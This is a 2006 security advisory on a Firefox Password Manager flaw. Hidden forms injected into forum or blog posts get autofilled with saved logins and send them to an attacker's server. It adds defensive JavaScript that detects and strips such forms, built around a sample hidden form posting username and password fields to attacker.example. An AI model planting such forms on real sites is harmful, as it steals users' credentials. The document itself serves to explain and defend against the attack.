Zone-H ITsec Advisories
Firefox Password Manager Information Disclosure
Written by Marcelo Almeida (Vympel)   
Thursday, 23 November 2006

Chapin Information Services (CIS) has discovered a new flaw in the Mozilla Firefox web browser that lets an attacker who can post HTML to a website harvest the passwords Firefox has saved for that site.

Given the new nature of this type of attack, CIS has named this a Reverse Cross-Site Request (RCSR) vulnerability.

This flaw could affect anyone visiting a weblog or forum website that allows user-contributed HTML to be added to its pages.

A proof-of-concept demonstration is available at the CIS website.

RCSR attacks are also actively targeting Microsoft Internet Explorer; however, a flaw in Firefox makes the attack much more likely to succeed there.


The Password Manager component of Firefox can be exploited to send a saved username and password combination to an attacker's computer without the user's knowledge.

Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum websites at trusted addresses.

A recent large-scale attack using RCSR targeted MySpace.com users and was first reported by Netcraft on 27 October 2006. That incident involved fake login forms injected into the MySpace website, inviting users to type in their username and password.

Forms and links can be used in a similar way to carry out Cross-Site Request Forgery (CSRF) attacks. The difference between CSRF and this new breed of RCSR attacks is the direction of data flow.

CSRF attacks are commonly used to add content to a blog or forum without the user's knowledge. This is done by "forging" a link or form that the website accepts without confirming the user's intent; the data flows into the trusted site.

RCSR, by contrast, takes data out of the blog or forum: the attacker injects into the trusted website a form whose action points back to a server the attacker controls.

The RCSR attack is much more likely to succeed because neither Internet Explorer nor Firefox checks where form data will be sent before the user submits it. The user sees a trusted website address in the browser's address bar because the exploit is hosted on the trusted website itself.

On 12 November 2006, CIS reported to Mozilla that the Firefox web browser will automatically fill saved usernames and passwords into such RCSR forms, because Password Manager matches saved logins on the page's hostname and field names without checking the form's action. This behavior does not occur in Internet Explorer unless the RCSR form appears on the same page as a legitimate login form.

Exacerbating this problem is the fact that forms can be completely hidden from view. As demonstrated in the CIS proof-of-concept, after saving a website password in Firefox, it is possible for that password to be transmitted to another website when the user unwittingly clicks an invisible image that submits the hidden form.

Mozilla confirmed this as bug 360493 and said a fix is already being worked on for version 2.0.0.1 or 2.0.0.2.

Both website-side changes (filtering user-contributed markup) and browser updates have been suggested to combat RCSR, and the website side is an increasingly valid concern for webmasters. However, a flawed Password Manager can only be fixed by the browser's authors. CIS has recommended several changes to both Firefox and Internet Explorer.

Microsoft responded by saying, "We are aware of the issue you reported." And, "As a matter of policy, we cannot comment on ongoing investigations."

Webmasters need to be aware of the implications of RCSR forms and how they work once added to a website. No client-side scripting is needed to steal information in this way, so this is not a Cross-Site Scripting (XSS) attack, and a filter that only strips <script> tags and event handlers from user content does not stop it: the <form> and <input> elements themselves are the payload.

CIS recommends all webmasters review server code for the possibility of XSS and RCSR injections, especially operators of HTTPS websites. These attacks could be highly effective against firewalled local network servers and HTTPS addresses that the attacker cannot otherwise reach: the attacker needs no direct access, because the victim's own browser, which can reach the internal server, submits the harvested credentials outward to the attacker.

In theory, combined CSRF and RCSR injections could change the appearance of a website and steal the user's password, even if scripts are filtered from user data.
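The following is an added example, not code from CIS, Mozilla or the Zone-H post, of the server-side review recommended above. It constructs a sample forum post carrying an RCSR form of the kind the advisory describes (hidden, action pointing at the attacker, login field names that a password manager would autofill, an invisible image input to submit it, and no script), then runs a pre-publication check that flags forms whose action resolves outside the site's origin and any password field in user content, and shows a hardened filter that strips form machinery from user content altogether. The site origin forum.example.com, the attacker host, and the names findRcsr, stripForms and tags are assumptions for the illustration.

```javascript
// Added example: a server-side check for RCSR forms in user-contributed HTML.
// Not code from CIS, Mozilla or Zone-H; the site origin, sample post and
// function names are assumptions for this illustration.
const SITE_ORIGIN = "https://forum.example.com"; // assumed trusted site

// Constructed sample of a forum post carrying an RCSR form. It is hidden,
// its action points at an attacker host (data flows OUT of the trusted site,
// the reverse of CSRF), it reuses the field names of the site's real login
// form so a password manager autofills them, and the full-page transparent
// image input submits it on an unwitting click. No script is involved.
const SAMPLE_POST = `
<p>Great thread, thanks!</p>
<form action="http://attacker.example/collect" method="post" style="display:none">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="image" src="http://attacker.example/blank.gif"
         style="position:absolute;top:0;left:0;width:100%;height:100%;opacity:0">
</form>
<a href="/thread/42">back to thread</a>
`;

// Minimal tag tokenizer: yields {closing, name, attrs} for each tag.
// Adequate for a pre-publication check on small snippets; a production
// filter should use a real HTML parser, since attribute values containing
// ">" or malformed markup can confuse regular expressions.
function* tags(html) {
  const tagRe = /<(\/?)([a-zA-Z][\w:-]*)([^>]*)>/g;
  const attrRe = /([^\s=\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[3])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? "";
    }
    yield { closing: m[1] === "/", name: m[2].toLowerCase(), attrs };
  }
}

// Flags (1) forms whose action resolves outside the site's origin and
// (2) password fields anywhere in user content. A missing or relative
// action resolves against the site origin, so "/reply" is not flagged;
// "//attacker.example/x" and "javascript:..." (origin "null") are.
function findRcsr(userHtml, siteOrigin = SITE_ORIGIN) {
  const findings = [];
  const site = new URL(siteOrigin).origin;
  let formAction = null; // action of the <form> currently open, if any
  for (const t of tags(userHtml)) {
    if (t.name === "form") {
      if (t.closing) { formAction = null; continue; }
      formAction = t.attrs.action ?? "";
      let target = null;
      try { target = new URL(formAction, siteOrigin + "/"); } catch (_e) { /* unparsable */ }
      if (target === null || target.origin !== site) {
        findings.push({ kind: "offsite-form-action", action: formAction });
      }
    } else if (t.name === "input" && !t.closing) {
      if ((t.attrs.type ?? "text").toLowerCase() === "password") {
        findings.push({ kind: "password-field", name: t.attrs.name ?? "", inForm: formAction });
      }
    }
  }
  return findings;
}

// Hardened handling: user content may not carry form machinery at all.
// Stripping <script> alone would leave this attack intact.
function stripForms(userHtml) {
  return userHtml.replace(/<\/?(form|input|button|select|textarea)\b[^>]*>/gi, "");
}

function demo() {
  for (const h of findRcsr(SAMPLE_POST)) console.log(JSON.stringify(h));
  console.log("after stripForms:", findRcsr(stripForms(SAMPLE_POST)).length, "findings");
}
demo();
```

Run with node; the sample post yields one offsite-form-action finding and one password-field finding, and the stripped version yields none. The origin comparison is deliberately the whole check: a form posting to a different scheme, host or port is off-site even if it looks like the trusted domain, and a same-origin form is still reported if it carries a password field, since user content has no business collecting passwords.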



Solution:
Until a fixed Firefox build is available, disable the "Remember passwords for sites" option in the preferences (the about:config preference signon.rememberSignons). This stops the autofill, but the injected form still appears at the trusted address, so site operators should also filter form and input elements out of user-contributed HTML.
